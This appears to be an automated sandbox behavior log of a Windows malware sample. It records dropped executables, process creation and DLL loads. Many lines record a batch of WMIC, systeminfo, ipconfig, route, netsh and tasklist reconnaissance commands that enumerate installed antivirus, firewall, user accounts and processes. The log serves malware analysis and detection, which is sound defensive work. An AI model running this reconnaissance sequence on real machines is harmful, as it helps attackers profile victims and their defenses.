Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: unknown	Process created: C:\Users\user\AppData\Roaming\uievsid C:\Users\user\AppData\Roaming\uievsid
Source: unknown	Process created: C:\Users\user\AppData\Roaming\haevsid C:\Users\user\AppData\Roaming\haevsid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\38E5.exe C:\Users\user\AppData\Local\Temp\38E5.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\BC8F.exe C:\Users\user\AppData\Local\Temp\BC8F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
